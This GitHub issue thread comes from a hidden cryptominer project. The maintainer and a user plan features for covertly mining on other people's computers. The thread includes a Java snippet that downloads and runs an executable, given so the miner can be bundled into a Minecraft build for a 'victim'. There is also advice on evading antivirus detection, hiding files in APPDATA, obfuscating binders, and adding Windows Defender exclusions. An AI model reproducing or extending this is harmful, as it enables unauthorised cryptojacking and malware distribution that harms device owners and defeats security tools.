### ISSUE TITLE
 how donate works in xmrig

### ISSUE THREAD

**Issue by Toxenskiy** [UnamSanctam/SilentXMRMiner#206] opened 2021-04-24 15:50 UTC

**Comment by Toxenskiy** [comment] 2021-04-24 16:52
you are offline or not answering

**Comment by UnamSanctam** [comment] 2021-04-24 16:54
What? I'm on my phone at the moment, did you write something anywhere?

**Comment by Toxenskiy** [comment] 2021-04-24 16:55
"how donate works in xmrig"

**Comment by Toxenskiy** [comment] 2021-04-24 16:55
apparently you do not receive a notification if I do not indicate anything in the comment of the topic

**Comment by UnamSanctam** [comment] 2021-04-24 16:58
Yeah it seems that way. But works in what way? If it's at 5% the it will mine to the dev adress for 5 minutes every 100 minutes (mine normally for 95 minutes then mine to dev for 5 minutes) if that's what you mean.

**Comment by Toxenskiy** [comment] 2021-04-24 17:01
judging by all tests with donate-lvl = 5 it takes 10 minutes to mine

**Comment by UnamSanctam** [comment] 2021-04-24 17:05
Hmm I've nerver tested anything so I'm not sure. How are you measuring it?

**Comment by Toxenskiy** [comment] 2021-04-24 17:06
process hacker

**Comment by UnamSanctam** [comment] 2021-04-24 18:01
What are you checking in Process Hacker to check it? So that I can test that myself.

**Comment by Toxenskiy** [comment] 2021-04-24 18:03
network

**Comment by Toxenskiy** [comment] 2021-04-24 18:04
can you believe me

**Comment by Toxenskiy** [comment] 2021-04-24 18:05
I even have a video.

**Comment by UnamSanctam** [comment] 2021-04-24 18:12
Oh sure I believe you but I want to do some tests to see why it would do that. It should be maxed at 5 min at the moment so it shouldn't be able to go over that.

**Comment by Toxenskiy** [comment] 2021-04-24 18:17
why do you need to conduct a test if first you should look at the source code, and I think it's not very important.

**Comment by UnamSanctam** [comment] 2021-04-24 18:19
Yeah it's maxed at 5 in the source which is why I have to test it incase there is something wrong.

**Comment by Toxenskiy** [comment] 2021-04-24 18:21
i would advise you to test this on the original xmrig first. 
for this, you can use the process monitor or other programs that allow you to monitor packages

**Comment by UnamSanctam** [comment] 2021-04-24 18:22
Yeah I'm going to test both at the same time

**Comment by Toxenskiy** [comment] 2021-04-24 18:27
there is some news on that suggestion

**Comment by Toxenskiy** [comment] 2021-04-25 14:18
Well, how's your progress?

**Comment by Toxenskiy** [comment] 2021-04-25 14:19
and again you ignored me on the question "there is some news on that suggestion"

**Comment by UnamSanctam** [comment] 2021-04-25 14:25
Well I wasn't home at the time so I missed the message since I don't have notifications on my phone. I did test it but it seems a bit weird. If I check with wireshark then both the normal XMRig and the custom XMRig and donate-level=5 usually donates for between 4-7 minutes (only tested both 3 times) but I'm not sure why it does that since it should switch the pools instantly. Maybe there is some sort of delay with the pool or the computer but it seems I have to test it with other settings like another pool maybe.

**Comment by Toxenskiy** [comment] 2021-04-25 14:27
with my tests, exactly 10 minutes
not a second more, not a second less

**Comment by Toxenskiy** [comment] 2021-04-25 14:31
with the original did not test

**Comment by Toxenskiy** [comment] 2021-04-25 14:32
I think there is nothing wrong with that, if you want you can put 2-3% by default

**Comment by UnamSanctam** [comment] 2021-04-25 14:33
Hmm, and that's with donate-level=5? The code is as follows:
```
 if (level >= kMinimumDonateLevel && level <= 5) {
        m_donateLevel = level;
    }
```
So it shouldn't be able to go over 5 even if you put it higher.

I'm planning on a new update soon with new features.

**Comment by Toxenskiy** [comment] 2021-04-25 14:35
the last significant update was 1.5 months ago
What update are you planning, if not a secret? And also I know 3 hidden miners and they also mine for 10 minutes with donate-lvl = 5 so this is how it should be

**Comment by UnamSanctam** [comment] 2021-04-25 14:40
Well that depends on what counts as significant (all the changes and what they do are here https://github.com/UnamSanctam/SilentXMRMiner#changes) but I'm planning on adding an uninstaller for the miner that you can enable to be built in the 'Advanced Options' window. I am also planning the remote configuration on pastebin or something like it where you can enter the pool and everything there and it will load it every time it runs.

**Comment by Toxenskiy** [comment] 2021-04-25 14:42
well, you already did it, just unofficially.

**Comment by Toxenskiy** [comment] 2021-04-25 14:45
> Hmm, and that's with donate-level=5? The code is as follows:
> 
> ```
>  if (level >= kMinimumDonateLevel && level <= 5) {
>         m_donateLevel = level;
>     }
> ```
> 
> So it shouldn't be able to go over 5 even if you put it higher.
> 
> I'm planning on a new update soon with new features.


and before it is not necessary to change this variable, you can change the variable in which the mining time is indicated and multiply or increase it

**Comment by UnamSanctam** [comment] 2021-04-25 14:47
Yes of course but I believe it's still the normal one, I can't remember ever having changed it. This is the code from the DonateStrategy file and to me it looks like it calculates it correctly.
```
 m_donateTime(static_cast<uint64_t>(controller->config()->pools().donateLevel()) * 60 * 1000),
    m_idleTime((100 - static_cast<uint64_t>(controller->config()->pools().donateLevel())) * 60 * 1000),
```

**Comment by Toxenskiy** [comment] 2021-04-25 14:50
possibly

**Comment by Toxenskiy** [comment] 2021-04-25 14:54
> Well that depends on what counts as significant (all the changes and what they do are here https://github.com/UnamSanctam/SilentXMRMiner#changes) but I'm planning on adding an uninstaller for the miner that you can enable to be built in the 'Advanced Options' window. I am also planning the remote configuration on pastebin or something like it where you can enter the pool and everything there and it will load it every time it runs.


however, I think the detections will increase in part because connecting to github or pastebin is already suspicious

**Comment by UnamSanctam** [comment] 2021-04-25 14:57
Yes it might, that's also the reason I had to change the original dev server from `donate.v2.xmrig.com` to something else because the traffic to it made it really easy to detect the miner and even made it so that your IP could be blocked in places where that server is on a blocklist.

**Comment by Toxenskiy** [comment] 2021-04-25 16:49
> well, you already did it, just unofficially.

да и ктомуже это  сложно назвать значимым

**Comment by UnamSanctam** [comment] 2021-04-25 16:50
Then what would you call significant?

**Comment by Toxenskiy** [comment] 2021-04-25 16:51
watchdog

**Comment by UnamSanctam** [comment] 2021-04-25 16:54
Yes but what possible new feature would you call significant? There isn't that many big features I can add without increasing detections or complexity in the builder.

**Comment by Toxenskiy** [comment] 2021-04-25 16:57
need to think

**Comment by Toxenskiy** [comment] 2021-04-25 17:00
the ability to update miners

**Comment by UnamSanctam** [comment] 2021-04-25 17:04
Yes that's what I was considering adding to the remote configuration with pastebin as well (so you could add a link to the miner on another row of the text) but a test I did before made it detected as a 'Downloader' by some antiviruses so I probably have to find some method of doing it that's not detected.

**Comment by Toxenskiy** [comment] 2021-04-25 17:05
try doing everything in memory without saving to disk

**Comment by Toxenskiy** [comment] 2021-04-25 17:06
that is, so that the file is downloaded and launched in memory, and after starting the miner will be saved in the path specified in the build

**Comment by UnamSanctam** [comment] 2021-04-25 17:06
Yeah but it's the actual download it detects so it detects it before the download is complete.

**Comment by Toxenskiy** [comment] 2021-04-25 17:08
no thoughts at all.

**Comment by UnamSanctam** [comment] 2021-04-25 17:09
Yeah, I'll try using other methods of downloading it until it stops detecting it.

**Comment by Toxenskiy** [comment] 2021-04-25 17:12
yes, but my idea is that the miner is updated but a new version when you release it, and not make a loader

**Comment by UnamSanctam** [comment] 2021-04-25 17:16
That only the XMRig miner gets updated and nothing else (i.e it downloads [this file](https://github.com/UnamSanctam/SilentXMRMiner/blob/master/SilentXMRMiner/Resources/xmrig.zip))? I guess I could do that but I'd have to make sure that the miner always stays backwards-compatible but that shouldn't be that difficult.

**Comment by Toxenskiy** [comment] 2021-04-25 17:36
you understood me correctly

**Comment by Toxenskiy** [comment] 2021-04-25 17:37
there is still one suggestion when cloning a file to a path to remove the icon

**Comment by Toxenskiy** [comment] 2021-04-25 18:06
i just think if a person finds a file in my APPDATA with the name Services and with a game or browser icon he will find it strange

**Comment by UnamSanctam** [comment] 2021-04-25 18:29
Yeah, only issue I'll have to think about is that the Icon is directly in the assembly so it's not as easy as it sounds but it might be possible to change the resources of the file to remove it (in a relatively easy way).

**Comment by Toxenskiy** [comment] 2021-04-25 19:05
do you know the java language?

**Comment by UnamSanctam** [comment] 2021-04-25 19:05
Yeah, I do

**Comment by Toxenskiy** [comment] 2021-04-25 19:07
hmm, but how can you add your stealer to the sources of minecraft versions?

**Comment by Toxenskiy** [comment] 2021-04-25 19:08
Start.java
`  
import java.io.File;

import java.lang.reflect.Field;
import java.util.Arrays;

import net.minecraft.client.main.Main;

public class Start
{
    public static void main(String[] args)
    {
        Main.main(concat(new String[] {"--version", "mcp", "--accessToken", "0", "--assetsDir", "assets", "--assetIndex", "1.12", "--userProperties", "{}"}, args));
    }

    public static <T> T[] concat(T[] first, T[] second)
    {
        T[] result = Arrays.copyOf(first, first.length + second.length);
        System.arraycopy(second, 0, result, first.length, second.length);
        return result;
    }
}`

**Comment by UnamSanctam** [comment] 2021-04-25 19:12
What exactly do you want to accomplish?

**Comment by Toxenskiy** [comment] 2021-04-25 19:12
well, how can you glue your miner with the version of minecraft

**Comment by UnamSanctam** [comment] 2021-04-25 19:18
Well if you want to do it directly in the code then either you can convert the program to a base64 string and code it as a variable that then converts the string back to bytes and writes it to a file and starts it when the program starts. Or you can just download the file from online, save it to disk and start it.

**Comment by Toxenskiy** [comment] 2021-04-25 19:26
I'm just in java full 0, and that's why I wanted to ask you at least an example code

**Comment by Toxenskiy** [comment] 2021-04-25 19:29
if it's not difficult, you can upload to pastebin

**Comment by UnamSanctam** [comment] 2021-04-25 19:42
This should work if you want to download and execute the miner, you can copy it into the current code you have:
```
import java.io.IOException;
import java.io.InputStream;
import java.net.MalformedURLException;
import java.net.URI;
import java.nio.file.Files;
import java.nio.file.Paths;

public class Download {
    public static void main(String []args) throws IOException {
        String downloadurl = "https://www.google.com";
        String filelocation = System.getProperty("user.dir")+"/test.exe";

        long bytesDownloaded = download(downloadurl, filelocation);
        Process process = new ProcessBuilder(filelocation, "").start();
    }

    static long download(String sourceUrl, String targetFileName) throws MalformedURLException, IOException {
        try (InputStream in = URI.create(sourceUrl).toURL().openStream()) {
            return Files.copy(in, Paths.get(targetFileName));
        }
    }
}
```

**Comment by Toxenskiy** [comment] 2021-04-25 19:45
can the original file name be anything? google.com/doksadop.exe but will persist along the path as test.exe

**Comment by UnamSanctam** [comment] 2021-04-25 19:48
Yes the original name can be anything, it will simply download all the data from the downloadurl and then create a file on the disk with the same data that has the name chosen in the filelocation string.

**Comment by Toxenskiy** [comment] 2021-04-26 11:37
and yes if you can clean the miner from "unam"

**Comment by UnamSanctam** [comment] 2021-04-26 11:39
Why? If you mean because of identifiable strings then things like '--url' are just as identifiable.

**Comment by Toxenskiy** [comment] 2021-04-26 11:40
I just have a bunch of plans and in many ways your watermark prevents me

**Comment by Toxenskiy** [comment] 2021-04-26 11:41
and again I don't have the source code for the rig

**Comment by UnamSanctam** [comment] 2021-04-26 11:42
Well I just used unam since I needed some unique string that won't interfere with the default options when they're added.  I would still need some sort of unique string that would make the options forwards-compatible.

**Comment by Toxenskiy** [comment] 2021-04-26 11:44
"your watermark"
why not name them more usually

**Comment by UnamSanctam** [comment] 2021-04-26 11:46
Well I did, unam is just a latin word.

**Comment by Toxenskiy** [comment] 2021-04-26 12:37
and when you do an official update from pastebin add 2 lines, the first for pastebin and the second for another pool if pastebin does not work

**Comment by Toxenskiy** [comment] 2021-04-26 12:38
and yes, when you are at home, you can throw off xmrig without unam

**Comment by UnamSanctam** [comment] 2021-04-26 12:39
It will use the connection settings on the first 'Main' tab instead if it can't reach pastebin. The pastebin link will be input in the 'Advanced Options' form.

**Comment by Toxenskiy** [comment] 2021-04-26 12:40
main - pool
secondary - pastebin
or vice versa?

**Comment by UnamSanctam** [comment] 2021-04-26 12:42
It will use the pastebin as the main connection settings if it can but will use the settings in the 'Main' tab as a backup if pastebin can't be reached.

**Comment by Toxenskiy** [comment] 2021-04-26 12:43
> and yes, when you are at home, you can throw off xmrig without unam

**Comment by Toxenskiy** [comment] 2021-04-27 04:06
I went to bed yesterday and I got an idea how you can make a configuration for the miner, you can do it in the same way as done in xmrig through parameters for example: SilentBuilder.exe -silent -stealth=on(off) -idle-wait=5 idle-mining=on

**Comment by UnamSanctam** [comment] 2021-04-27 06:12
Yeah the problem is that if I do it that way then it might not be compatible with new versions and thus making an auto-updater would be a bad idea. Since if I name it --silent now and XMRig decides to add a feature with the same configuration name later then I would have to change their name into something else (which would be confusing and time wasting) since otherwise it would collide with my configuration option.

**Comment by Toxenskiy** [comment] 2021-04-28 04:15
Well, what's the update coming out ??

**Comment by Toxenskiy** [comment] 2021-04-28 16:21
ignore again. I have an idea for gluing why not just do the gluing through normal base64 convert the file to base64 and insert the lines well, you can automate this

**Comment by UnamSanctam** [comment] 2021-04-28 16:25
The update will come out when I can get a library in the ethereum miner to stop returning unresolved external symbols and fix a bug with the new AMD drivers. You can use base64 converts but keep in mind that it will increase the file size quite a lot since it converts bytes into base64.

**Comment by Toxenskiy** [comment] 2021-04-28 16:27
I suggested that you make the "glue" functions

**Comment by UnamSanctam** [comment] 2021-04-28 16:29
Well it's possible to just bind files in the source already but I haven't added it since using an external binder is better if you're going to add Windows Defender exclusions, etc before the miner is extracted.

**Comment by Toxenskiy** [comment] 2021-04-28 16:31
well, you can run the program glued to the miner after starting the miner itself

**Comment by UnamSanctam** [comment] 2021-04-28 16:32
Yes but you would usually want to execute programs before the miner.

**Comment by Toxenskiy** [comment] 2021-04-28 16:33
no, I mean the usual gluing, that is, just a binder

**Comment by Toxenskiy** [comment] 2021-04-28 16:33
by importance is something in the area of ​​the icon

**Comment by Toxenskiy** [comment] 2021-04-28 16:35
glue is the only feature missing.

**Comment by UnamSanctam** [comment] 2021-04-28 16:36
Why wouldn't you just use a file binder for that?

**Comment by Toxenskiy** [comment] 2021-04-28 16:37
I do not know binders that will not add detections to the miner

**Comment by UnamSanctam** [comment] 2021-04-28 16:40
Well, it's usually the same detections as the miner since it's technically also a binder, if the binder is made in .NET you can use .NET Reactor or ConfuserEx on the binder as well.

**Comment by Toxenskiy** [comment] 2021-04-28 16:41
well that's why i want you to make glue because it can be protected

**Comment by UnamSanctam** [comment] 2021-04-28 16:43
Sure but that would take a while since I would have to add a box where you can control the files and a lot of options of where to drop the file, whether to execute it, what order to execute in, etc.

**Comment by Toxenskiy** [comment] 2021-04-28 16:45
start miner.exe:
if miner not installed: 
   install miner
   reboot program
else:
    start glue_file

**Comment by UnamSanctam** [comment] 2021-04-28 16:46
What? What would be the purpose of that? What would the glue_file do?

**Comment by Toxenskiy** [comment] 2021-04-28 16:47
glue_file is your file that you added to the build

**Comment by Toxenskiy** [comment] 2021-04-28 16:48
restarting the program so that the session gets lost, otherwise if there is a virus in glue_file, then both the miner and glue_file itself will be deleted

**Comment by UnamSanctam** [comment] 2021-04-28 16:48
But which file would glue_file be and what would it do?

**Comment by Toxenskiy** [comment] 2021-04-28 16:50
your program, that is, add your program to the miner for example a calculator

**Comment by Toxenskiy** [comment] 2021-04-28 16:51
victim start program and after launch, both the miner and the real application are launched.

**Comment by UnamSanctam** [comment] 2021-04-28 16:52
I still think a file binder would be better for it, use something like https://github.com/Paskowsky/Dream-AIO and then obfuscate the  binded file after its built.

**Comment by Toxenskiy** [comment] 2021-04-28 16:53
this is of course all good, but not relevant, and besides, it is not such a complex code and

**Comment by Toxenskiy** [comment] 2021-04-28 16:54
you can do something fresher than a year

**Comment by UnamSanctam** [comment] 2021-04-28 16:58
Well it would be quite complex if I wanted to make it well and customizable.

**Comment by Toxenskiy** [comment] 2021-04-28 16:59
and what can be configured there? Obviously, the miner goes first.

**Comment by UnamSanctam** [comment] 2021-04-28 17:01
Where to drop the file, whether to execute it, what order to execute in, what to execute it as, whether to inject it or drop and execute, whether to remove it after execution.

**Comment by Toxenskiy** [comment] 2021-04-28 17:05
why throw it away somewhere ?? Obviously, the miner is in priority and it starts first, and then glue_file. And why delete it, it will arouse even more suspicion.

**Comment by UnamSanctam** [comment] 2021-04-28 17:07
Because not everyone wants to do the same things nor have the same things planned, I can think of many reasons why you would want all of them. The glue_file has to be placed down into some folder and then run from that folder unless you want to inject it and run it but then it would have to be a native file and not a managed one.

**Closed** 2021-05-07 21:50 UTC
